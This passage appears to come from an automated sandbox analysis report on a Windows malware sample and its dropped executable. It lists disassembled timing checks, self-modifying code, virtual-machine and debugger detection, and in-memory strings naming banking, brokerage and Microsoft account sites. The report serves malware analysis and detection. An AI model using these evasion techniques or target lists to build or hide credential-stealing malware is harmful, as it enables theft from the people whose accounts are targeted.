          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53509C5 second address: 53509C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 100DB7D second address: 100DB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 100DB81 second address: 100DB8B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAF74D778D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 1177740 second address: 1177744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 118A629 second address: 118A647 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAF74D778D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007FAF74D778E2h 0x00000012 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 118A647 second address: 118A691 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF74D8F58Bh 0x00000007 push ecx 0x00000008 jbe 00007FAF74D8F586h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007FAF74D8F598h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FAF74D8F598h 0x0000001e rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 118BEE3 second address: 118BEE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 118BEE7 second address: 118BEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 118BEED second address: 100DB7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 48AB8758h 0x00000011 pushad 0x00000012 xor dword ptr [ebp+122D20D7h], esi 0x00000018 mov dword ptr [ebp+122D1DDBh], esi 0x0000001e popad 0x0000001f push dword ptr [ebp+122D0361h] 0x00000025 mov edx, esi 0x00000027 or cl, 00000068h 0x0000002a call dword ptr [ebp+122D2DF2h] 0x00000030 pushad 0x00000031 or dword ptr [ebp+122D1D57h], eax 0x00000037 xor eax, eax 0x00000039 cmc 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e mov dword ptr [ebp+122D1D57h], edx 0x00000044 mov dword ptr [ebp+122D1DB6h], ecx 0x0000004a mov dword ptr [ebp+122D2B08h], eax 0x00000050 mov dword ptr [ebp+122D1DB6h], ecx 0x00000056 mov esi, 0000003Ch 0x0000005b pushad 0x0000005c movsx ebx, di 0x0000005f mov ch, 39h 0x00000061 popad 0x00000062 add esi, dword ptr [esp+24h] 0x00000066 jmp 00007FAF74D778E1h 0x0000006b lodsw 0x0000006d mov dword ptr [ebp+122D1DB6h], ebx 0x00000073 clc 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 jmp 00007FAF74D778E6h 0x0000007d mov ebx, dword ptr [esp+24h] 0x00000081 mov dword ptr [ebp+122D1D33h], ebx 0x00000087 push eax 0x00000088 push eax 0x00000089 push edx 0x0000008a push eax 0x0000008b push edx 0x0000008c push eax 0x0000008d push edx 0x0000008e rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 118C0FB second address: 118C14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jnl 00007FAF74D8F586h 0x0000000d popad 0x0000000e popad 0x0000000f pop eax 0x00000010 clc 0x00000011 push 00000003h 0x00000013 call 00007FAF74D8F597h 0x00000018 pushad 0x00000019 mov eax, 62DD22C2h 0x0000001e popad 0x0000001f pop esi 0x00000020 push 00000000h 0x00000022 sub dword ptr [ebp+122D1D57h], eax 0x00000028 push 00000003h 0x0000002a mov ecx, dword ptr [ebp+122D2A3Ch] 0x00000030 push 849020E1h 0x00000035 pushad 0x00000036 push eax 0x00000037 jbe 00007FAF74D8F586h 0x0000003d pop eax 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 118C14F second address: 118C1BE instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAF74D778D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 3B6FDF1Fh 0x00000012 xor dword ptr [ebp+122D2F4Bh], edx 0x00000018 lea ebx, dword ptr [ebp+12451DE9h] 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007FAF74D778D8h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 0000001Dh 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 sub dword ptr [ebp+122D2061h], edx 0x0000003e jmp 00007FAF74D778DCh 0x00000043 xchg eax, ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FAF74D778E7h 0x0000004b rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 118C1BE second address: 118C1C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 118C1C5 second address: 118C1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jne 00007FAF74D778D8h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007FAF74D778D6h 0x00000019 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 118C261 second address: 118C265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 118C265 second address: 118C26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 118C26B second address: 118C2F9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push ecx 0x0000000b jmp 00007FAF74D8F58Ch 0x00000010 pop ecx 0x00000011 pop ecx 0x00000012 nop 0x00000013 mov edi, dword ptr [ebp+122D2CD8h] 0x00000019 sub dword ptr [ebp+122D2DD3h], ebx 0x0000001f push 00000000h 0x00000021 adc dl, FFFFFFEEh 0x00000024 call 00007FAF74D8F589h 0x00000029 pushad 0x0000002a jmp 00007FAF74D8F595h 0x0000002f jmp 00007FAF74D8F591h 0x00000034 popad 0x00000035 push eax 0x00000036 jmp 00007FAF74D8F592h 0x0000003b mov eax, dword ptr [esp+04h] 0x0000003f jng 00007FAF74D8F594h 0x00000045 mov eax, dword ptr [eax] 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b pop eax 0x0000004c rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 118C2F9 second address: 118C303 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 118C303 second address: 118C307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 118C307 second address: 118C38C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c jmp 00007FAF74D778E5h 0x00000011 push ebx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 pop eax 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007FAF74D778D8h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov ch, DCh 0x00000033 mov edi, dword ptr [ebp+122D2AE4h] 0x00000039 mov dl, F3h 0x0000003b push 00000003h 0x0000003d mov edi, dword ptr [ebp+122D2B94h] 0x00000043 push 00000000h 0x00000045 mov di, 34E4h 0x00000049 push 00000003h 0x0000004b mov dword ptr [ebp+122D21C0h], edi 0x00000051 push E5E4186Dh 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FAF74D778E9h 0x0000005d rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11AB79E second address: 11AB7B2 instructions: 0x00000000 rdtsc 0x00000002 js 00007FAF74D8F586h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007FAF74D8F588h 0x00000012 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11ABA50 second address: 11ABA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11ABA56 second address: 11ABA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11ABA5B second address: 11ABA60 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11ABA60 second address: 11ABA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11ABD57 second address: 11ABD62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11ABD62 second address: 11ABD68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11ABD68 second address: 11ABD7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FAF74D778DCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11ABEB6 second address: 11ABEBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11ABEBC second address: 11ABECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FAF74D778DBh 0x0000000c rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11ABECE second address: 11ABEF1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAF74D8F586h 0x00000008 jmp 00007FAF74D8F596h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11ABEF1 second address: 11ABF0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jno 00007FAF74D778D6h 0x00000012 popad 0x00000013 push edi 0x00000014 je 00007FAF74D778D6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11ABF0D second address: 11ABF1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jng 00007FAF74D8F586h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11AC050 second address: 11AC054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11AC19F second address: 11AC1A9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAF74D8F586h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11AC1A9 second address: 11AC1CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FAF74D778DBh 0x0000000c jl 00007FAF74D778D6h 0x00000012 pop ecx 0x00000013 popad 0x00000014 jl 00007FAF74D778FAh 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11AC1CE second address: 11AC1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF74D8F594h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11AC66B second address: 11AC66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11AC66F second address: 11AC673 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11818F0 second address: 11818F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11ACAFD second address: 11ACB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11AE817 second address: 11AE81B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11AE81B second address: 11AE83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAF74D8F596h 0x0000000f rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11AFFA3 second address: 11AFFB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF74D778DCh 0x00000009 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRDTSC instruction interceptor: First address: 11B4EBE second address: 11B4EC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Tries to evade debugger and weak emulator (self modifying code)
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 79ED10 instructions caused by: Self-modifying code
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeSpecial instruction interceptor: First address: 100DBDB instructions caused by: Self-modifying code
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeSpecial instruction interceptor: First address: 11AE9B9 instructions caused by: Self-modifying code
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeSpecial instruction interceptor: First address: 100B19E instructions caused by: Self-modifying code
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeSpecial instruction interceptor: First address: 124646A instructions caused by: Self-modifying code
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeMemory allocated: 58D0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeMemory allocated: 5AB0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeMemory allocated: 58D0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0118C216 rdtsc 10_2_0118C216
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 4128Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exe TID: 3920Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: file.exeBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
          Source: file.exe, 00000006.00000002.1509191410.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000003.1507177296.000000000129E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
          Source: file.exe, 00000006.00000003.1341313741.0000000005E08000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
          Source: file.exe, 00000006.00000002.1509059596.000000000123E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW [*
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
          Source: file.exeBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
          Source: file.exe, 00000006.00000003.1341313741.0000000005E03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Hides threads from debuggers
          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeThread information set: HideFromDebuggerJump to behavior
          Potentially malicious time measurement code found
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeCode function: 10_2_0118C1AE Start: 0118C1DE End: 0118C1C510_2_0118C1AE
          Tries to detect sandboxes and other dynamic analysis tools (window names)
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeOpen window title or class name: regmonclass
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeOpen window title or class name: gbdyllo
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeOpen window title or class name: procmon_window_class
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeOpen window title or class name: ollydbg
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeOpen window title or class name: filemonclass
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeFile opened: NTICE
          Source: C:\Users\user\AppData\Local\Temp\AU963ROPSBOYUMXP3FF.exeFile opened: SICE
